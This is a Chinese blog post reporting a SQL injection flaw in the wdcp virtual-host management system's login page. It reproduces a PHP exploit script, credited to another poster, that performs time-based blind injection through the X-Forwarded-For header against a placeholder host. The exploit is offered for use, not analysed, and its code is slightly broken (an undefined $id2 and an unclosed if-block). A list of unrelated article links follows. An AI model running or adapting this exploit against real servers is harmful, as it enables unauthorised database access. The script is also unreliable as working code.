当前位置: 首页 > news >正文

wdcp虚拟主机管理系统注入漏洞

wdcp服务器/虚拟主机管理系统登陆框注入漏洞。

passwd字段存在注入风险,选择限制字符长度为30.我想应该有大牛能绕过!


 

下面给出由伟大娃娃发布的漏洞利用脚本


    <?php   
    $id=$_GET["id"];   
    //$id2=$_GET["id2"];   
    $post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';   
      $url='http://xxx:8080/';   
      $starttime = time();   
      $ch = curl_init();   
      curl_setopt($ch, CURLOPT_POST, 1);   
      curl_setopt($ch, CURLOPT_URL,$url);   
        //curl_setopt($ch, CURLOPT_TIMEOUT, 3);   
      curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #'));     
      curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);   
      ob_start();   
      curl_exec($ch);   
      $result = ob_get_contents() ;   
      ob_end_clean();   
      $endtime = time();   
    if($endtime-$starttime>=3){   
      exit($id." is ".chr($id2));   
    echo $result;   
    ?>  


相关文章:

  • python发送GET或POST请求以便干一些趣事
  • SSH安全技巧
  • JSP过滤器防止Xss漏洞
  • XSS漏洞解决方案之一:过滤器
  • 五个你必须知道的javascript和web debug技术
  • 12 款最好的 Bootstrap 设计工具
  • 设置Jetty服务器的cookie为secure和httponly
  • XSS与HTTP-only Cookie 脚本获取JSESSIONID的方法
  • DNS 安全信息 (微软)
  • DNS安全 -月宫吴刚
  • ldap 身份验证的通用步骤
  • Openssl多个安全补丁简易分析危害及修复方案
  • Redhat Linux 安全设置脚本
  • nginx中shell脚本封锁采集IP地址
  • Apache和Tomcat限制文件访问或下载
  • __proto__ 和 prototype的关系
  • Cumulo 的 ClojureScript 模块已经成型
  • Docker 笔记(2):Dockerfile
  • electron原来这么简单----打包你的react、VUE桌面应用程序
  • If…else
  • JAVA并发编程--1.基础概念
  • LeetCode刷题——29. Divide Two Integers(Part 1靠自己)
  • PHP面试之三:MySQL数据库
  • Sequelize 中文文档 v4 - Getting started - 入门
  • socket.io+express实现聊天室的思考(三)
  • 互联网大裁员:Java程序员失工作,焉知不能进ali?
  • 嵌入式文件系统
  • 与 ConTeXt MkIV 官方文档的接驳
  • ​卜东波研究员:高观点下的少儿计算思维
  • #我与Java虚拟机的故事#连载02:“小蓝”陪伴的日日夜夜
  • #我与Java虚拟机的故事#连载03:面试过的百度,滴滴,快手都问了这些问题
  • (007)XHTML文档之标题——h1~h6
  • (1/2)敏捷实践指南 Agile Practice Guide ([美] Project Management institute 著)
  • (C语言)strcpy与strcpy详解,与模拟实现
  • (vue)el-checkbox 实现展示区分 label 和 value(展示值与选中获取值需不同)
  • (读书笔记)Javascript高级程序设计---ECMAScript基础
  • (二)斐波那契Fabonacci函数
  • (十一)c52学习之旅-动态数码管
  • (一)基于IDEA的JAVA基础1
  • (转)创业家杂志:UCWEB天使第一步
  • .net 4.0 A potentially dangerous Request.Form value was detected from the client 的解决方案
  • .NET 4.0网络开发入门之旅-- 我在“网” 中央(下)
  • .NET CORE 3.1 集成JWT鉴权和授权2
  • .NET Core MongoDB数据仓储和工作单元模式封装
  • .net core使用RPC方式进行高效的HTTP服务访问
  • .NET 使用 XPath 来读写 XML 文件
  • .NET框架
  • .NET下ASPX编程的几个小问题
  • .NET应用架构设计:原则、模式与实践 目录预览
  • .pings勒索病毒的威胁:如何应对.pings勒索病毒的突袭?
  • .so文件(linux系统)
  • /usr/bin/env: node: No such file or directory
  • @param注解什么意思_9000字,通俗易懂的讲解下Java注解
  • [ 网络基础篇 ] MAP 迈普交换机常用命令详解
  • [30期] 我的学习方法